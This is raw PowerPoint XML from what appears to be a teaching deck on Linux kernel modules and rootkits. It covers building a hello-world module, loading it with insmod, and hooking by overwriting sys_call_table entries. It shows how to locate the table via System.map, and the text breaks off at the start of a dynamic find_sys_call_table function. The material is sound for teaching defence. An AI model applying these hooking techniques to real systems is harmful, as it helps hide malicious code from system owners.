                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="14" end="14"/>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="16" end="16"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="16" end="16"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="53" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="17" end="17"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="17" end="17"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="56" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="18" end="18"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="18" end="18"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="59" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="19" end="19"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="19" end="19"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="62" presetID="3" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="20" end="20"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5">
                                            <p:txEl>
                                              <p:pRg st="20" end="2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1"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hello world module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="1339769"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Save as “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Makefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532435" y="3055716"/>
            <a:ext cx="184731" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532435" y="3055716"/>
            <a:ext cx="8900932" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>obj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-m += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hello.o</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>all:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	make -C /lib/modules/$(shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -r)/build M=$(PWD) modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>clean:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	make -C /lib/modules/$(shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>uname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -r)/build M=$(PWD) clean	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="607165449"/>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1"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hello world module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4870047"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compile:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>make</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Install module</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>insmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hello.ko</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lsmod</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remove module</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> hello</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>modprobe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: do any of the above</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>dmesg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> | tail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>View messages logged by your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>kmod</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532435" y="3055716"/>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532072699"/>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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What is a rootkit?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why is a kernel rootkit especially bad?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Why should we care about rootkits?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Stuxnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> story!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1432858189"/>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Hooking: The Concept</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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_call_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is a pointer to the start of an array of pointers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can access the pointer of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NR_namegoeshere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Is a function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NR_blah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is the number of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> position in the SCT array, defined in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can we overwrite an entry in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> table with a pointer to our rouge function instead</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2140627183"/>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Hooking: The Concept</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="952500" y="1585732"/>
            <a:ext cx="7239000" cy="5029200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5335929" y="2592729"/>
            <a:ext cx="748096" cy="1507604"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Cross 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2510374">
            <a:off x="5420298" y="2998196"/>
            <a:ext cx="398992" cy="405483"/>
          </a:xfrm>
          <a:prstGeom prst="plus">
            <a:avLst>
              <a:gd name="adj" fmla="val 44418"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln>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27376882"/>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Finding the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall_table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1471612"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To hook </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscalls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, we need to locate the start of the system call table in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Need to find </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_call_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>address to the start of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One way: compile the kernel, statically define </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sys_call_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> by the value found in /boot/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>System.map-x.x.x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="219919" y="5646832"/>
            <a:ext cx="8704162" cy="701486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1959343768"/>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43069"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Finding the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>syscall_table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="714737"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More complex way: find it dynamically. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="856527" y="2314937"/>
            <a:ext cx="6647974" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>unsigned long *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>find_sys_call_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> ( void )		</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>	{	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t> **p;	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t>	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t> long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0" err="1"/>
              <a:t>sct_off</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1200" dirty="0"/>
              <a:t> = 0;	</a:t>
